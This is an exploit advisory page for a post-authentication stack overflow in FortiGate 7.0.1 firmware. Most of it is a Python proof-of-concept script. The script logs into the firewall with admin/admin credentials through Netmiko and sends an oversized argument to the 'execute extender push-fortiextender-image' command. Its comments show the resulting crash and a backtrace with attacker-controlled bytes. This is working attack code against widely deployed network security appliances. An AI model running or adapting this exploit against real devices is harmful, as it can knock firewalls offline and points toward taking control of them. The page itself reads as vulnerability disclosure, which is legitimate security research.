Fortigate 7.0.1 Stack Overflow

2023.05.03
Credit: Cody Sixteen
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-119

c@ubuntu:~/LABS$ cat fp17.py #!/usr/bin/env python3 # fortigate 7.0.1 postauth stack overflow 0day # # more: # https://code610.blogspot.com/2023/04/fuzzing-fortigate-7.html # # Pid: 00243, application: newcli, # Firmware: FortiGate-VM64 v7.0.1,build0157b0157,210714 (GA) (Release), # Signal 6 received, Backtrace: # [0x7f498e5f16f0] [0x7f498e5f2d47] [0x7f498e633f47] [0x7f498e6c2c9e] # [0x7f498e6c2c62] [0x01f10f4d] [0x4343434342424242] # # from netmiko import Netmiko login = 'admin' passwd = 'admin' target = '192.168.56.222' fw_01 = { 'host' : target, 'username' : login, 'password' : passwd, 'device_type' : 'fortinet' } print("> connecting to the target: %s" % target) net_connect = Netmiko(**fw_01) # print( net_connect.find_prompt() ) payload = 'execute extender push-fortiextender-image ' payload += 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCDDDD' + 'F'*300 + ' asd' command = payload full_config_cmd = net_connect.send_command( command ) print(full_config_cmd) print("done")


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top